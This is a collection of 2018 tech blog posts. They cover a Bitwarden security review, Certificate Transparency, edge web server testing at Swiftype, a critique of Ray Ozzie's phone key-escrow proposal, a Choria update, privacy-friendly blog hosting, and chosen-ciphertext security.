Braintreegateway, Google, etc. Some of these I know, some I don't. Trust I have in none of them. It would take too long to explain why this is a bad idea, but the gist of it is that the more resources you load and allow from different sources, the bigger the attack surface becomes. Perhaps these are perfectly secure (right now…), but an import part of security is the developers' security mindset. Some of these resources could have easily been hosted on the same origin servers. Some of these resources should only be allowed to run from payment pages. It shows sloppy configuration of the Content-Security-Policy, namely site-wide configuration in the web server (probably) rather than being determined on an URL by URL basis. The actual client-side encryption library is loaded from vault.bitwarden.com, which is good. However, the (possibility of) inclusion of scripts from other sources negates any security benefits of doing so. The inclusion of Google analytics in a password manager is, in my opinion, inexcusable. It's not required functionality for the application, so it shouldn't be in there. ## New password entry is sent securely When adding a new authentication entry, the entry appears to be client-side encrypted in some way before sending it to the server: { "name": "2.eD4fFLYUWmM6sgVDSA9pTg==|SNzQjLitpA5K+6qrBwC7jw==|DlfVCnVdZA9+3oLej4FHSQwwdo/CbmHkL2TuwnfXAoI=", "organizationId": null, "fields": null, "notes": null, "favorite": false, "login": { "username": null, "password": "2.o4IO/yzz6syip4UEaU4QpA==|LbCyLjAOHa3m2wopsqayYK9O7Q5aqnR8nltUgylwSOo=|6ajVAh0r9OaBs+NgLKrTd+j3LdBLKBUbs/q8SE6XvUE=", "totp": null }, "folderId": null, "type": 1 } It's base64 again, and decodes into the same obscure binary string as the password when logging in. I have not spent time looking at how exactly the encoding / encryption is happening, so I cannot claim that this is actually secure. So keep that in mind. It does give credence to Bitwarden's claims that all sensitive data is encrypted client-side before sending it to the server. ## Disclosure of my email address to a third part without my consent I clicked on the "Data breach report" link on the left, and Bitwarden immediately sent my email address to https://haveibeenpwned.com. No confirmation, no nothing; it was disclosed to a third party immediately. Well, actually, since I use uMatrix to firewall my browser, it wasn't and I had to explicitly allow it to do so, but even most security nerds don't use uMatrix. That's not cool. Don't disclose my info to third parties without my consent. ## Developer mindset One of, if not the, most important aspects is the developer mindset. That is, do they care about security and are they knowledgeable in the field? Bitwarden appears to know what they're doing. They have a security policy and run a bug bounty program. Security incidents appear to be solved quickly. I'd like to see more documentation on how the encryption, transfer and storage of secrets works. Right now, there are some FAQ entries, but it's all promisses that give me no insight into where and how the applied security might break down. One thing that bothers me is that they do not disclose any of the security trade-offs they made and how it impacts the security of your secrets. I'm always weary when claims of perfect security are made, whether explicitely, or by omission of information. There are obvious problems with client-side javascript encryption, which every developer and user with an reasonable understanding of web developers recognises. No mention of this is made. Instead, security concerns are waved away with "everything is encrypted on your device!". That's nice, but if attackers can control the code that does the encryption, all is lost. Please note that I'm not saying that client-side javascript encryption is a bad decision! It's a perfectly reasonable trade-off between the convenience of being able to access your secrets on all your devices and a more secure way of managing your passwords. However, this trade-off should be disclosed prominently to users. ## Conclusion So, is Bitwarden (Cloud) secure and should you use it? Unfortunately, I can't give you any advice. It all depends on your requirements. All security is a tradeoff between usability, convenience and security. I did this review because my organisation is looking into a self-hosted Open Source password manager to manage our organisation's secrets. Would I use this to keep my personal passwords in? The answer is: no. I use an offline Keepass, which I manually sync from my laptop to my phone every now and then. This is still the most secure way of managing passwords that I do not need to share with anyone. However, that's not the use-case that I reviewed Bitwarden for. So would I use it to manage our organisation's secrets? Perhaps, the jury is still out on that. I'll need to look at the self-hosted version to see if it also includes Javascript from unreliable sources. If so, I'd have to say that, no, I would not recommend Bitwarden. ## April 30, 2018 ### ma.ttias.be #### Certificate Transparency logging now mandatory The post Certificate Transparency logging now mandatory appeared first on ma.ttias.be. All certificates are now required to be logged in publicly available logs (aka "Certificate Transparency"). Since January 2015, Chrome has required that Extended Validation (EV) certificates be CT-compliant in order to receive EV status. In April 2018, this requirement will be extended to all newly-issued publicly-trusted certificates -- DV, OV, and EV -- and certificates failing to comply with this policy will not be recognized as trusted when evaluated by Chrome. In other words: if Chrome encounters a certificate, issued after April 2018, that isn't signed by a Certificate Transparency log, the certificate will be marked as insecure. Don't want to have this happen to you out of the blue? Monitor your sites and their certificate health via Oh Dear!. The post Certificate Transparency logging now mandatory appeared first on ma.ttias.be. ## April 28, 2018 ### Homo-Adminus #### Edge Web Server Testing at Swiftype This article has been originally posted on Swiftype Engineering blog. For any modern technology company, a comprehensive application test suite is an absolute necessity. Automated testing suites allow developers to move faster while avoiding any loss of code quality or system stability. Software development has seen great benefit come from the adoption of automated testing frameworks and methodologies, however, the culture of automated testing has neglected one key area of modern web application serving stack: web application edge routing and multiplexing rulesets. From modern load balancer appliances that allow for TCL based rule sets; local or remotely hosted varnish VCL rules; or in the power and flexibility that Nginx and OpenResty make available through LUA, edge routing rulesets have become a vital part of application serving controls. Over the past decade or so, it has become possible to incorporate more and more logic into edge web server infrastructures. Almost every modern web server has support for scripting, enabling developers to make their edge servers smarter than ever before. Unfortunately, the application logic configured within web servers is often much harder to test than that hosted directly in application code, and thus too often software teams resort to manual testing, or worse, customers as testers, by shipping their changes to production without edge routing testing having been performed. In this post, I would like to explain the approach Swiftype has taken to ensure that our test suites account for our use of complex edge web server logic to manage our production traffic flow, and thus that we can confidently deploy changes to our application infrastructure with little or no risk. ### Our Web Infrastructure Before I go into details of our edge web server configuration testing, it may be helpful to share an overview of the infrastructure behind our web services and applications. Swiftype has evolved from a relatively simple Rails monolith and is still largely powered by a set of Ruby applications served by Unicorn application servers. To balance traffic between the multitude of application instances, we use Haproxy (mainly for its observability features and the fair load balancing implementation). Finally, there is an OpenResty (nginx+lua) layer at the edge of our infrastructure that is responsible for many key functions: SSL termination and enforcement, rate limiting, as well as providing flexible traffic management and routing functionality (written in Lua) customized specifically for the Swiftype API. Here is a simple diagram of our web application infrastructure: Swiftype web infrastructure overview ### Testing Edge Web Servers Swiftype’s edge web server configuration contains thousands of lines of code: from Nginx configs to custom templates rendered during deployment, to complex Lua logic used to manage production API traffic.Any mistake in this configuration, if not caught in testing, could lead to an outage at our edge, and considering that 100% of our API traffic is served through this layer, any outage at the edge is likely to be very impactful to our customers and our business. This is why we have invested time and resources to build a system that allows us to test our edge configuration changes in development and on CI before they are deployed to production systems. #### Testing Workflow Overview The first step in safely introducing change is ensuring that development and testing environments are quarantined from production environments. To do this we have created an “isolated” runtime mode for our edge web server stack. All changes to our edge configurations are first developed and run in this “isolated” mode. The “isolated” mode has no references to production backend infrastructure, and thus by employing the “isolated” mode, developers are able to iterate very quickly in a local environment without fear of harmful repercussions. All tests are written to run as part of the “isolated” mode employ a mock server to emulate production backends and primarily focus on the unit-testing of specific new features that are being implemented. When we are confident enough in our unit-tested set of changes, we could run the same set of tests in an “acceptance testing” mode when the mock server used in isolated tests is replaced with an Haproxy load balancer with access to production networks. Working on tests and running them in this mode allows us to ensure with the highest degree of certainty that our changes will work in a real production environment since we exercise our whole stack while running the test suite. #### Testing Environment Overview Our testing environment employs Docker containers to serve in place of our production web servers. The test environment is comprised of the following components: • A loopback network interface on which a full complement of production IPs are configured to account for every service we are planning to test (e.g. a service foo.swiftype.com pointing to an IP address 10.1.0.x in production is tested in a local “isolated” testing environment with IP 10.1.0.x assigned to an alias on the local loopback interface). This allows us to perform end-to-end testing: DNS resolution, TCP service connections to a specific IP address, etc. without needing access to production, nor local /etc/hosts or name resolution changes. • For use cases where we are testing changes that are not represented in DNS (for example, when preparing edge servers for serving traffic currently handled by a different service), we may still employ local /etc/hosts entries to point the DNS name for a service to a local IP address for the period of testing. In this scenario, we ensure that our tests have been written in a way that is independent of the DNS configuration, and thus that the tests can be reused at a later date, or when the configuration has been deployed to production. • An OpenResty server instance with the configuration we need to test. • A test runner process (based on RSpec and a custom framework for writing our tests). • An optional Mock server. (As noted above, this might be docker in a local test environment, or in CI, and is likely to be used as part of the test runner process, where it emulates an external application/service; serves in place of a production backends; or acts as a local Haproxy instance running a production configuration and may even route traffic to real production backends. #### Isolated Testing Walkthrough Here is how a test for a hypothetical service foo.swiftype.com (registered in DNS as 1.2.3.4) is performed in an isolated environment: 1. We automatically assign 1.2.3.4 as an alias on a loopback interface. 2. We start a mock server listening on the localhost configured to respond on the same port used by the foo.swiftype.com Nginx server backend (in production, there would be haproxy on that port) with a specific stub response. 3. Our test performs a DNS resolution for foo.swiftype.com, receives 10.1.0.x as the IP of the service, connects to the local Nginx instance listening on 10.1.0.x (bound to a loopback interface) and performs a test call. 4. Nginx, receiving the test request, performs all configured operations and forwards the request to a backend, which in this case is handled by the local mock server. The call result is then returned by Nginx to the test runner. 5. The test runner performs all defined testing against the server response: These tests can be very thorough, as the test runner has access to the server response code, all headers, and also the response body, and can thus confirm that all data returned meets each test’s specifications before concluding if the process as a whole has passed or failed test validation. 6. Specific to isolated testing: In some use cases, we may validate the state of the Mock server, verifying that it has received all call we expected it to receive and that each call represented the data and headers expected. This can be very useful for testing changes where our web layer has been configured to alter requests (rewrite, add or remove headers, etc.) prior to passing them to a given backend. Here is a diagram illustrating a test running in an isolated environment: An isolated testing environment #### Acceptance Testing Walkthrough When all of our tests have passed in our “isolated” environment, and we want to make sure our configurations work in a non-mock, physically “production-like” environment (or during our periodic acceptance test runs that must also run in a production mirroring environment), we use an “acceptance testing” mode. In this mode, we replace our mock server with a real production Haproxy load balancer instance talking to real production backends (or a subset of backends representing a real production application). Here is what happens during an acceptance test for the same hypothetical service foo.swiftype.com (registered in DNS as 1.2.3.4): 1. We automatically assign 1.2.3.4 as an alias on a loopback interface. 2. We start a dedicated production Haproxy instance, with a configuration pointing to production backend applications, and bind this dedicated haproxy instance to localhost. (This exactly mirrors what we do in production, where haproxy is always a dedicated localhost service). 3. Our test performs DNS resolution for foo.swiftype.com, receives 10.1.0.x as the IP of the service, connects to a local Nginx instance listening on 10.1.0.x (bound to a loopback interface), and performs a test call. 4. Nginx, receiving a test request, performs whatever operations are defined and forwards it to a local Haproxy backend, which in turn sends the request to a production application instance. When a call is complete, the result is returned by Nginx to the test runner. 5. The test runner performs all defined checks on the response and defines whether the call and response are identified as passing or failing the test. Here is a diagram illustrating a test call made in an acceptance testing environment: A test call within the acceptance testing environment ### Conclusion Using our edge web server testing framework for the past few years, we have been able to perform hundreds of high-risk changes in our production edge infrastructure without any significant incidents being caused by the deploying of an untested configuration update. Our testing framework provides us the assurances we need, such that we can make very dramatic changes to our web application edge routing (services that affect every production request) and that we can be confident in our ability to introduce these changes safely. We highly recommend that every engineering team tasked with building or operating complex edge server configurations adopt some level of testing that allows the team to iterate faster without fear of compromising these critical components. ## April 26, 2018 ### Cryptography Engineering #### A few thoughts on Ray Ozzie’s “Clear” Proposal Yesterday I happened upon a Wired piece by Steven Levy that covers Ray Ozzie’s proposal for “CLEAR”. I’m quoted at the end of the piece (saying nothing much), so I knew the piece was coming. But since many of the things I said to Levy were fairly skeptical — and most didn’t make it into the piece — I figured it might be worthwhile to say a few of them here. Ozzie’s proposal is effectively a key escrow system for encrypted phones. It’s receiving attention now due to the fact that Ozzie has a stellar reputation in the industry, and due to the fact that it’s been lauded by law enforcement (and some famous people like Bill Gates). Ozzie’s idea is the just the latest bit of news in this second edition of the “Crypto Wars”, in which the FBI and various law enforcement agencies have been arguing for access to end-to-end encryption technologies — like phone storage and messaging — in the face of pretty strenuous opposition by (most of) the tech community. In this post I’m going to sketch a few thoughts about Ozzie’s proposal, and about the debate in general. Since this is a cryptography blog, I’m mainly going to stick to the technical, and avoid the policy details (which are substantial). Also, since the full details of Ozzie’s proposal aren’t yet public — some are explained in the Levy piece and some in this patent — please forgive me if I get a few details wrong. I’ll gladly correct. [Note: I’ve updated this post in several places in response to some feedback from Ray Ozzie. For the updated parts, look for the *. Also, Ozzie has posted some slides about his proposal.] ### How to Encrypt a Phone The Ozzie proposal doesn’t try tackle every form of encrypted data. Instead it focuses like a laser on the simple issue of encrypted phone storage. This is something that law enforcement has been extremely concerned about. It also represents the (relatively) low-hanging fruit of the crypto debate, for essentially two reasons: (1) there are only a few phone hardware manufacturers, and (2) access to an encrypted phone generally only takes place after law enforcement has gained physical access to it. I’ve written about the details of encrypted phone storage in a couple of previous posts. A quick recap: most phone operating systems encrypt a large fraction of the data stored on your device. They do this using an encryption key that is (typically) derived from the user’s passcode. Many recent phones also strengthen this key by “tangling” it with secrets that are stored within the phone itself — typically with the assistance of a secure processor included in the phone. This further strengthens the device against simple password guessing attacks. The upshot is that the FBI and local law enforcement have not — until very recently (more on that further below) — been able to obtain access to many of the phones they’ve obtained during investigation. This is due the fact that, by making the encryption key a function of the user’s passcode, manufacturers like Apple have effectively rendered themselves unable to assist law enforcement. ### The Ozzie Escrow Proposal Ozzie’s proposal is called “Clear”, and it’s fairly straightforward. Effectively, it calls for manufacturers (e.g., Apple) to deliberately put themselves back in the loop. To do this, Ozzie proposes a simple form of key escrow (or “passcode escrow”). I’m going to use Apple as our example in this discussion, but obviously the proposal will apply to other manufacturers as well. Ozzie’s proposal works like this: 1. Prior to manufacturing a phone, Apple will generate a public and secret “keypair” for some public key encryption scheme. They’ll install the public key into the phone, and keep the secret key in a “vault” where hopefully it will never be needed. 2. When a user sets a new passcode onto their phone, the phone will encrypt a passcode under the Apple-provided public key. This won’t necessarily be the user’s passcode, but it will be an equivalent passcode that can unlock the phone.* It will store the encrypted result in the phone’s storage. 3. In the unlikely event that the FBI (or police) obtain the phone and need to access its files, they’ll place the phone into some form of law enforcement recovery mode. Ozzie describes doing this with some special gesture, or “twist”. Alternatively, Ozzie says that Apple itself could do something more complicated, such as performing an interactive challenge/response with the phone in order to verify that it’s in the FBI’s possession. 4. The phone will now hand the encrypted passcode to law enforcement. (In his patent, Ozzie suggests it might be displayed as a barcode on a screen.) 5. The law enforcement agency will send this data to Apple, who will do a bunch of checks (to make sure this is a real phone and isn’t in the hands of criminals). Apple will access their secret key vault, and decrypt the passcode. They can then send this back to the FBI. 6. Once the FBI enters this code, the phone will be “bricked”. Let me be more specific: Ozzie proposes that once activated, a secure chip inside the phone will now permanently “blow” several JTAG fuses monitored by the OS, placing the phone into a locked mode. By reading the value of those fuses as having been blown, the OS will never again overwrite its own storage, will never again talk to any network, and will become effectively unable to operate as a normal phone again. When put into its essential form, this all seems pretty simple. That’s because it is. In fact, with the exception of the fancy “phone bricking” stuff in step (6), Ozzie’s proposal is a straightforward example of key escrow — a proposal that people have been making in various guises for many years. The devil is always in the details. ### A vault of secrets If we picture how the Ozzie proposal will change things for phone manufacturers, the most obvious new element is the key vault. This is not a metaphor. It literally refers to a giant, ultra-secure vault that will have to be maintained individually by different phone manufacturers. The security of this vault is no laughing matter, because it will ultimately store the master encryption key(s) for every single device that manufacturer ever makes. For Apple alone, that’s about a billion active devices. Does this vault sound like it might become a target for organized criminals and well-funded foreign intelligence agencies? If it sounds that way to you, then you’ve hit on one of the most challenging problems with deploying key escrow systems at this scale. Centralized key repositories — that can decrypt every phone in the world — are basically a magnet for the sort of attackers you absolutely don’t want to be forced to defend yourself against. So let’s be clear. Ozzie’s proposal relies fundamentally on the ability of manufacturers to secure extremely valuable key material for a massive number of devices against the strongest and most resourceful attackers on the planet. And not just rich companies like Apple. We’re also talking about the companies that make inexpensive phones and have a thinner profit margin. We’re also talking about many foreign-owned companies like ZTE and Samsung. This is key material that will be subject to near-constant access by the manufacturer’s employees, who will have to access these keys regularly in order to satisfy what may be thousands of law enforcement access requests every month. If ever a single attacker gains access to that vault and is able to extract, a few “master” secret keys (Ozzie says that these master keys will be relatively small in size*) then the attackers will gain unencrypted access to every device in the world. Even better: if the attackers can do this surreptitiously, you’ll never know they did it. Now in fairness, this element of Ozzie’s proposal isn’t really new. In fact, this key storage issue an inherent aspect of all massive-scale key escrow proposals. In the general case, the people who argue in favor of such proposals typically make two arguments: 1. We already store lots of secret keys — for example, software signing keys — and things works out fine. So this isn’t really a new thing. 2. Hardware Security Modules. Let’s take these one at a time. It is certainly true that software manufacturers do store secret keys, with varying degrees of success. For example, many software manufacturers (including Apple) store secret keys that they use to sign software updates. These keys are generally locked up in various ways, and are accessed periodically in order to sign new software. In theory they can be stored in hardened vaults, with biometric access controls (as the vaults Ozzie describes would have to be.) But this is pretty much where the similarity ends. You don’t have to be a technical genius to recognize that there’s a world of difference between a key that gets accessed once every month — and can be revoked if it’s discovered in the wild — and a key that may be accessed dozens of times per day and will be effectively undetectable if it’s captured by a sophisticated adversary. Moreover, signing keys leak all the time. The phenomenon is so common that journalists have given it a name: it’s called “Stuxnet-style code signing”. The name derives from the fact that the Stuxnet malware — the nation-state malware used to sabotage Iran’s nuclear program — was authenticated with valid code signing keys, many of which were (presumably) stolen from various software vendors. This practice hasn’t remained with nation states, unfortunately, and has now become common in retail malware. The folks who argue in favor of key escrow proposals generally propose that these keys can be stored securely in special devices called Hardware Security Modules (HSMs). Many HSMs are quite solid. They are not magic, however, and they are certainly not up to the threat model that a massive-scale key escrow system would expose them to. Rather than being invulnerable, they continue to cough up vulnerabilities like this one. A single such vulnerability could be game-over for any key escrow system that used it. In some follow up emails, Ozzie suggests that keys could be “rotated” periodically, ensuring that even after a key compromise the system could renew security eventually. He also emphasizes the security mechanisms (such as biometric access controls) that would be present in such a vault. I think that these are certainly valuable and necessary protections, but I’m not convinced that they would be sufficient. ### Assume a secure processor Let’s suppose for a second that an attacker does get access to the Apple (or Samsung, or ZTE) key vault. In the section above I addressed the likelihood of such an attack. Now let’s talk about the impact. Ozzie’s proposal has one significant countermeasure against an attacker who wants to use these stolen keys to illegally spy on (access) your phone. Specifically, should an attacker attempt to illegally access your phone, the phone will be effectively destroyed. This doesn’t protect you from having your files read — that horse has fled the stable — but it should alert you to the fact that something fishy is going on. This is better than nothing. This measure is pretty important, not only because it protects you against evil maid attacks. As far as I can tell, this protection is pretty much the only measure by which theft of the master decryption keys might ever be detected. So it had better work well. The details on how this might work aren’t very clear in Ozzie’s patent, but the Wired article describes it as follows. This quote to repeat Ozzie’s presentation at Columbia University: What Ozzie appears to describe here is a secure processor contained within every phone. This processor would be capable if securely and irreversibly enforcing that once law enforcement has accessed a phone, that phone could no longer be placed into an operational state. My concern with this part of Ozzie’s proposal is fairly simple: this processor does not currently exist. To explain why this, let me tell a story. Back in 2013, Apple began installing a secure processor in each of their phones. While this secure processor (called the Secure Enclave Processor, or SEP) is not exactly the same as the one Ozzie proposes, the overall security architecture seems very similar. One main goal of Apple’s SEP was to limit the number of passcode guessing attempts that a user could make against a locked iPhone. In short, it was designed to keep track of each (failed) login attempt and keep a counter. If the number of attempts got too high, the SEP would make the user wait a while — in the best case — or actively destroy the phone’s keys. This last protection is effectively identical to Ozzie’s proposal. (With some modest differences: Ozzie proposes to “blow fuses” in the phone, rather than erasing a key; and he suggests that this event would triggered by entry of a recovery passcode.*) For several years, the SEP appeared to do its job fairly effectively. Then in 2017, everything went wrong. Two firms, Cellebrite and Grayshift, announced that they had products that effectively unlocked every single Apple phone, without any need to dismantle the phone. Digging into the details of this exploit, it seems very clear that both firms — working independently — have found software exploits that somehow disable the protections that are supposed to be offered by the SEP. The cost of this exploit (to police and other law enforcement)? About3,000-$5,000 per phone. Or (if you like to buy rather than rent) about$15,000. Aso, just to add an element of comedy to the situation, the GrayKey source code appears to have recently been stolen. The attackers are extorting the company for two Bitcoin. Because 2018. ()

Let me sum this up my point in case I’m not beating you about the head quite enough:

The richest and most sophisticated phone manufacturer in the entire world tried to build a processor that achieved goals similar to those Ozzie requires. And as of April 2018, after five years of trying, they have been unable to achieve this goala goal that is critical to the security of the Ozzie proposal as I understand it.

Now obviously the lack of a secure processor today doesn’t mean such a processor will never exist. However, let me propose a general rule: if your proposal fundamentally relies on a secure lock that nobody can ever break, then it’s on you to show me how to build that lock.

### Conclusion

While this mainly concludes my notes about on Ozzie’s proposal, I want to conclude this post with a side note, a response to something I routinely hear from folks in the law enforcement community. This is the criticism that cryptographers are a bunch of naysayers who aren’t trying to solve “one of the most fundamental problems of our time”, and are instead just rejecting the problem with lazy claims that it “can’t work”.

As a researcher, my response to this is: phooey.

Cryptographers — myself most definitely included — love to solve crazy problems. We do this all the time. You want us to deploy a new cryptocurrency? No problem! Want us to build a system that conducts a sugar-beet auction using advanced multiparty computation techniques? Awesome. We’re there. No problem at all.

But there’s crazy and there’s crazy.

The reason so few of us are willing to bet on massive-scale key escrow systems is that we’ve thought about it and we don’t think it will work. We’ve looked at the threat model, the usage model, and the quality of hardware and software that exists today. Our informed opinion is that there’s no detection system for key theft, there’s no renewability system, HSMs are terrifically vulnerable (and the companies largely staffed with ex-intelligence employees), and insiders can be suborned. We’re not going to put the data of a few billion people on the line an environment where we believe with high probability that the system will fail.

Maybe that’s unreasonable. If so, I can live with that.

## April 25, 2018

### R.I.Pienaar

#### Choria Progress Update

It’s been a while since my previous update and quite a bit have happened since.

## Choria Server

As previously mentioned the Choria Server will aim to replace mcollectived eventually. Thus far I was focussed on it’s registration subsystem, Golang based MCollective RPC compatible agents and being able to embed it into other software for IoT and management backplanes.

Over the last few weeks I learned that MCollective will no longer be shipped in Puppet Agent version 6 which is currently due around Fall 2018. This means we have to accelerate making Choria standalone in it’s own right.

A number of things have to happen to get there:

• Choria Server should support Ruby agents
• The Ruby libraries Choria Server needs either need to be embedded and placed dynamically or provided via a Gem
• The Ruby client needs to be provided via a Gem
• New locations for these Ruby parts are needed outside of AIO Ruby

Yesterday I released the first step in this direction, you can now replace mcollectived with choria server. For now I am marking this as a preview/beta feature while we deal with issues the community finds.

The way this works is that we provide a small shim that uses just enough of MCollective to get the RPC framework running – luckily this was initially developed as a MCollective plugin and it retained its quite separate code base. When the Go code needs to invoke a ruby agent it will call the shim to do so, the shim in turn will provide the result from the agent – in JSON format – back to Go.

This works for me with any agent I’ve tried it with and I am quite pleased with the results:

 USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 10820 0.0 1.1 1306584 47436 ? Sl 13:50 0:06 /opt/puppetlabs/puppet/bin/ruby /opt/puppetlabs/puppet/bin/mcollectived 

MCollective would of course include the entire Puppet as soon as any agent that uses Puppet is loaded – service, package, puppet – and so over time things only get worse. Here is Choria:

 USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 32396 0.0 0.5 296436 9732 ? Ssl 16:07 0:03 /usr/sbin/choria server --config=/etc/choria/server.conf 

I run a couple 100 000 instances of this and this is what you get, it never changes really. This is because Choria spawns the Ruby code and that will exit when done.

This has an unfortunate side effect that the service, package and puppet agents are around 1 second slower per invocation because loading Puppet is really slow. Ones that do not load Puppet are only marginally slower.

 irb(main):002:0> Benchmark.measure { require "puppet" }.real => 0.619865644723177 

There is a page set up dedicated to the Beta that details how to run it and what to look out for.

## JSON pure protocol

Some of the reasons for breakage that you might run into – like mco facts is not working now with Choria Server – is due to a hugely significant change in the background. Choria – both plugged into MCollective and Standalone – is JSON safe. The Ruby Plugin is optionally so (and off by default) but the Choria daemon only supports JSON.

Traditionally MCollective have used YAML on the wire, being quite old JSON was really not that big a deal back in the early 2000s when the foundation for this choice was laid down, XML was more important. Worse MCollective have exposed Ruby specific data types and YAML extensions on the wire which have made creating cross platform support nearly impossible.

YAML is also of course capable of carrying any object – which means some agents are just never going to be compatible with anything but Ruby. This was the case with the process agent but I fixed that before shipping it in Choria. It also essentially means YAML can invoke things you might not have anticipated and so happens big security problems.

Since quite some time now the Choria protocol is defined, versioned and JSON schemas are available. The protocol makes the separation between Payload, Security, Transport and Federation much clearer and the protocol can now support anything that can move JSON – Middleware, REST, SSH, Postal Doves are all capable of carrying Choria packets.

There is a separate Golang implementation of the protocol that is transport agnostic and the schemas are there. Version 1 of the protocol is a tad skewed to MCollective but Version 2 (not yet planned) will drop those shackles. A single Choria Server is capable of serving multiple versions of the network protocol and communicate with old and new clients.

Golang being a static language and having a really solid and completely compatible implementation of the protocol means making ones for other languages like Python etc will not be hard. However I think long term the better option for other languages are still a capable REST gateway.

I did some POC work on a very very light weight protocol suitable for devices like Arduino and will provide bridging between the worlds in our Federation Brokers. You’ll be able to mco rpc wallplug off, your client will talk full Choria Protocol and the wall plug might speak a super light weight MQTT based protocol and you will not even know this.

There are some gotchas as a result of these changes, also captured in the Choria Server evaluation documentation. To resolve some of these I need to be much more aggressive with what I do to the MCollective libraries, something I can do once they are liberated out of Puppet Agent.

## April 23, 2018

### Vincent Bernat

#### A more privacy-friendly blog

When I started this blog, I embraced some free services, like Disqus or Google Analytics. These services are quite invasive for users’ privacy. Over the years, I have tried to correct this to reach a point where I do not rely on any “privacy-hostile” services.

# Analytics⚓︎

I opted for a simpler solution: no analytics. It also enables me to think that my blog attracts thousands of visitors every day.

# Fonts⚓︎

Google Fonts is a very popular font library and hosting service, which relies on the generic Google Privacy Policy. The google-webfonts-helper service makes it easy to self-host any font from Google Fonts. Moreover, with help from pyftsubset, I include only the characters used in this blog. The font files are lighter and more complete: no problem spelling “Antonín Dvořák”.

# Videos⚓︎

• After: self-hosted

Some articles are supported by a video (like “OPL2LPT: an AdLib sound card for the parallel port“). In the past, I was using YouTube, mostly because it was the only free platform with an option to disable ads. Streaming on-demand videos is usually deemed quite difficult. For example, if you just use the <video> tag, you may push a too big video for people with a slow connection. However, it is not that hard, thanks to hls.js, which enables to deliver video sliced in segments available at different bitrates. Users with Java­Script disabled are still delivered with a progressive version of medium quality.

In “Self-hosted videos with HLS”, I explain this approach in more details.

For some time, I thought about implementing my own comment system around Atom feeds. Each page would get its own feed of comments. A piece of Java­Script would turn these feeds into HTML and comments could still be read without Java­Script, thanks to the default rendering provided by browsers. People could also subscribe to these feeds: no need for mail notifications! The feeds would be served as static files and updated on new comments by a small piece of server-side code. Again, this could work without Javascript.

I still think this is a great idea. But I didn’t feel like developing and maintaining a new comment system. There are several self-hosted alternatives, notably Isso and Commento. Isso is a bit more featureful, with notably an imperfect import from Disqus. Both are struggling with maintenance and are trying to become sustainable with a paid hosted version.1 Commento is more privacy-friendly as it doesn’t use cookies at all. However, cookies from Isso are not essential and can be filtered with nginx:

proxy_hide_header Set-Cookie;


In Isso, there is currently no mail notifications, but I have added an Atom feed for each comment thread.

Another option would have been to not provide comments anymore. However, I had some great contributions as comments in the past and I also think they can work as some kind of peer review for blog articles: they are a weak guarantee that the content is not totally wrong.

# Search engine⚓︎

A way to provide a search engine for a personal blog is to provide a form for a public search engine, like Google. That’s what I did. I also slapped some Java­Script on top of that to make it look like not Google.

The solution here is easy: switch to DuckDuckGo, which lets you customize a bit the search experience:

<form id="lf-search" action="https://duckduckgo.com/">
<input type="hidden" name="kf" value="-1">
<input type="hidden" name="kaf" value="1">
<input type="hidden" name="k1" value="-1">
<input type="hidden" name="sites" value="vincent.bernat.im/en">
<input type="submit" value="">
<input type="text" name="q" value="" autocomplete="off" aria-label="Search">
</form>


The Java­Script part is also removed as DuckDuckGo doesn’t provide an API. As it is unlikely that more than three people will use the search engine in a year, this seems a good idea to not spend too much time on this non-essential feature.

MailChimp is a common solution to send newsletters. It provides a simple integration with RSS feeds to trigger a mail each time new items are added to the feed. From a privacy point of view, MailChimp seems a good citizen: data collection is mainly limited to the amount needed to operate the service. Privacy-conscious users can still avoid this service and use the RSS feed.

# Less Java­Script⚓︎

• Before: third-party Java­Script code
• After: self-hosted Java­Script code

Many privacy-conscious people are disabling Java­Script or using extensions like uMatrix or NoScript. Except for comments, I was using Java­Script only for non-essential stuff:

For mathematical formulae, I have switched from MathJax to KaTeX. The later is faster but also enables server-side rendering: it produces the same output regardless of browser. Therefore, client-side Java­Script is not needed anymore.

For sidenotes, I have turned the Java­Script code doing the transformation into Python code, with pyquery. No more client-side Java­Script for this aspect either.

The remaining code is still here but is self-hosted.

# Memento: CSP⚓︎

The HTTP Content-Security-Policy header controls the resources that a user agent is allowed to load for a given page. It is a safeguard and a memento for the external resources a site will use. Mine is moderately complex and shows what to expect from a privacy point of view:3

Content-Security-Policy:
default-src 'self' blob:;
script-src  'self' blob: https://d1g3mdmxf8zbo9.cloudfront.net/js/;
object-src  'self' https://d1g3mdmxf8zbo9.cloudfront.net/images/;
img-src     'self' data: https://d1g3mdmxf8zbo9.cloudfront.net/images/;
frame-src   https://d1g3mdmxf8zbo9.cloudfront.net/images/;
style-src   'self' 'unsafe-inline' https://d1g3mdmxf8zbo9.cloudfront.net/css/;
worker-src  blob:;
media-src   'self' blob: https://luffy-video.sos-ch-dk-2.exo.io;
frame-ancestors 'none';
block-all-mixed-content;


I am quite happy having been able to reach this result. 😊

1. For Isso, look at comment.sh. For Commento, look at commento.io↩︎

2. You may have noticed I am a footnote sicko and use them all the time for pointless stuff. ↩︎

3. I don’t have issue with using a CDN like CloudFront: it is a paid service and Amazon AWS is not in the business of tracking users. ↩︎

## April 21, 2018

### Cryptography Engineering

#### Wonk post: chosen ciphertext security in public-key encryption (Part 1)

In general I try to limit this blog to posts that focus on generally-applicable techniques in cryptography. That is, I don’t focus on the deeply wonky. But this post is going to be an exception. Specifically, I’m going to talk about a topic that most “typical” implementers don’t — and shouldn’t — think about.

Specifically: I’m going to talk about various techniques for making public key encryption schemes chosen ciphertext secure. I see this as the kind of post that would have saved me ages of reading when I was a grad student, so I figured it wouldn’t hurt to write it all down.

### Background: CCA(1/2) security

Early (classical) ciphers used a relatively weak model of security, if they used one at all. That is, the typical security model for an encryption scheme was something like the following:

1. I generate an encryption key (or keypair for public-key encryption)
2. I give you the encryption of some message of my choice
3. You “win” if you can decrypt it

This is obviously not a great model in the real world, for several reasons. First off, in some cases the attacker knows a lot about the message to be decrypted. For example: it may come from a small space (like a set of playing cards). For this reason we require a stronger definition like “semantic security” that assumes the attacker can choose the plaintext distribution, and can also obtain the encryption of messages of his/her own choice. I’ve written more about this here.

More relevant to this post, another limitation of the above game is that — in some real-world examples — the attacker has even more power. That is: in addition to obtaining the encryption of chosen plaintexts, they may be able to convince the secret keyholder to decrypt chosen ciphertexts of their choice.

The latter attack is called a chosen-ciphertext (CCA) attack.

At first blush this seems like a really stupid model. If you can ask the keyholder to decrypt chosen ciphertexts, then isn’t the scheme just obviously broken? Can’t you just decrypt anything you want?

